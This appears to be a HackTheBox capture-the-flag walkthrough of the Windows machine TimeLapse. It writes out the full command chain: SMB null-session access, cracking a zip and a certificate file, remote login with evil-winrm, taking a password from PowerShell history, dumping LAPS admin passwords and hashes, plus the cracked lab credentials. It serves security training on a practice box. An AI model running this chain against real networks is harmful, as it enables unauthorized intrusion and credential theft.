TimeLapse HackTheBox WalkThrough
This is TimeLapse HackTheBox machine walkthrough. In this writeup, I have demonstrated step-by-step how I rooted TimeLapse HackTheBox
machine. Before starting let us know something about this machine. It is Windows OS
box with IP address 10.10.11.152
and difficulty easy
assigned by its maker.
First of all, connect your PC with HackTheBox VPN
and make sure your connectivity with TimeLapse machine by pinging its IP 10.10.11.152
. If all goes correct then start hacking. As usual, I started by scanning the machine. Scanning gives us an idea how we have to proceed further. Like, it helps in banner grabbing the services running over different ports and sometimes it helps in vulnerability assessment also. I have used $ nmap
[a popular port scanner] for this task and the result is given below: –
Scanning
$ sudo nmap -p- --min-rate=10000 -oN tcpfull-scan.nmap 10.10.11.152
$ cat tcpfull-scan.nmap
$ sudo nmap -p53,88,135,139,389,445,464,593,636,3269,5986,9389 -sC -sV -oN tcpScript-scan.nmap 10.10.11.152
$ cat tcpScript-scan.nmap
Full port scan with $ nmap
found port no. 53
, 88
, 135
, 139
, 389
, 445
, 464
, 593
, 636
, 3269
, 5986
& 9389
as open. Checking the services on ports 53
, 88
, 389
& 389
it appears to be an Active Directory
environment. Among these ports, the notable ports are 53, 88, 135, 139, 389, 445 & 5986 since the services on these ports are well known. DNS Server
is running on port 53
, Kerberos
on 88
, Microsoft RPC
on 135
, SMB
on 139
& 445
, LDAP
on 389
& 636
and winrm
on port 5986
are running. We will use port 5986
for remote logging whenever we will get any credential.
As usual, I started my enumeration from port 139
& 445
as SMB
service is running on these ports. If Null Session
will be allowed, we will get some information to dig deeper into it. Null Session
is allowed here. Let us connect with the open share and download all the files from the shared folder. After downloading all the files found a zip
file named winrm_backup.zip
.
$ smbclient -U "" -L //10.10.11.152
$ smbclient //10.10.11.152/Shares
smb: \> cd Dev\
smb: \Dev\> get winrm_backup.zip
smb: \Dev\> exit
The zip file is password protected.
$ unzip winrm_backup.zip
Cracking Password
I have used $ johntheripper
[an offline password cracker] and wordlist rockyou.txt
to crack the password of this file.
$ zip2john winrm_backup.zip > zip.hash
$ john --wordlist=/usr/share/wordlists/rockyou.txt zip.hash
The cracked password is supremelegacy
. On unzipping winrm_backup.zip
found a pfx
file inside it.
A pfx
file is an archive file. It contains both public key
as well as private key
and sometimes contains a chain of keys
responsible for trustworthiness of the certificate. All the keys inside any pfx file may or may not be password protected. A pfx file can be used for TLS/SSL on web site, for digitally signing messages or authorization tokens, or for authenticating to a partner system.
Our pfx file is password protected. Tried to login with some default password like admin
, password
, root
, TimeLapse
, etc. but none worked. So, we have to crack the password of this file too.
$ unzip winrm_backup.zip -d winrm_backup
~supremelegacy
$ cd winrm_backup/
$ open legacyy_dev_auth.pfx
To crack the password I have used the same tool $ johntheripper
[an offline password cracker] with the same wordlist rockyou.txt
[rockyou.txt is present by default in the directory /usr/share/wordlists/
in Kali and Parrot OS.]
$ pfx2john legacyy_dev_auth.pfx > legacy.hash
$ john --wordlist=/usr/share/wordlists/rockyou.txt legacy.hash
The cracked password is thuglegacy
. Since pfx
file is an archive file and contains public key and private key so let us extract both the keys from this file. We can use $ openssl
tool for this purpose. I have followed this article from IBM documentation for the same.
$ cd winrm_backup/
$ openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out private.key
Enter Import Password: thuglegacy
Enter PEM pass phrase: thuglegacy
Verifying – Enter PEM pass phrase: thuglegacy
$ openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out key.crt
Enter Import Password: thuglegacy
$ ls
Now we have both, the certificate containing public key and the private key of the SSL. Also, we have port no. 5986
open on the server so we can use $ evil-winrm
to connect TimeLapse machine using these keys. Let us remotely connect to the server.
Getting User Shell
$ evil-winrm -i 10.10.11.152 -u " " -p "thuglegacy" -c key.crt -k private.key -S
~thuglegacy
$ whoami
We have successfully logged in into the TimeLapse box. Let us capture user flag.
Capture User Flag
$ cat \Users\legacyy\Desktop\user.txt
Privilege Escalation
To escalate the privilege to root we have to first find a Privilege Escalation Vector
using, which we can perform, privilege escalation. We can find PrivEsc vector either manually or using some post exploitation enumeration scripts like winPEAS, PowerUp.ps1, and there are a lot more. This time I will go with winPEAS
viz. script enumeration technique.
Finding PrivEsc Vector
winPEAS
found PowerShell Console history file named ConsoleHost_hostory.txt
inside the directory C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\
.
ConsoleHost_history.txt
file is located at the location %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\
. It holds history of recent Windows PowerShell commands executed by particular user. This file is same as .bash_history
file in Linux as both these files contain the recent commands used by the particular user.
On checking the content of this file found some Ps-remoting commands already used on this machine. The used user is svc_deploy
and the user password is E3R$Q62^12p7PLlC%KWaxuaV
.
$ cat C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
When I checked the details of user svg_deploy
then found that svg_deploy is part of LAPS_Readers
group.
$ net user svc_deploy
Since svg_deploy
is the member of LAPS_Readers
group, therefore we can use LAPSDumber tool to dump every LAPS password the account has access to read, within the entire domain. To use LAPSDumber
follow the below steps.
$ git clone https://github.com/n00py/LAPSDumper.git
$ cd LAPSDumper/
$ python3 laps.py -u 'svc_deploy' -p 'E3R$Q62^12p7PLlC%KWaxuaV' -d 'timelapse.htb'
The extracted local admin password is 5cz8(5ZNvaONZ4u1rio)b#/.
. When I tried to login into admin account using the credential Administrator
: 5cz8(5ZNvaONZ4u1rio)b#/.
I would easily logged in as local admin
. So here, our Privilege Escalation Vector is Privilege Escalation by reusing credential stored in PowerShell History
.
Since winrm
port [5986] is open so let us use the above credential to get admin access using $ evil-winrm
.
Getting Admin Shell
$ evil-winrm -u administrator -p '5cz8(5ZNvaONZ4u1rio)b#/.' -i 10.10.11.152 -S
$ whoami
We have successfully logged in into local admin account. Let us capture root flag.
Capture Root Flag
$ Get-Childitem -Path C:\Users -Include root.txt -Recurse
$ cat C:\Users\TRX\Desktop\root.txt
Dumping Root Hash
$ impacket-secretsdump [email protected]
~5cz8(5ZNvaONZ4u1rio)b#/.
This was how I rooted to TimeLapse HackTheBox machine. Learnt a lot during this walkthrough. Hope you have also learnt some new things. Thanks for reading this writeup. Want to give any suggestion about the writeup feel free to write us at [email protected]. Check out my latest articles at https://ethicalhacs.com/.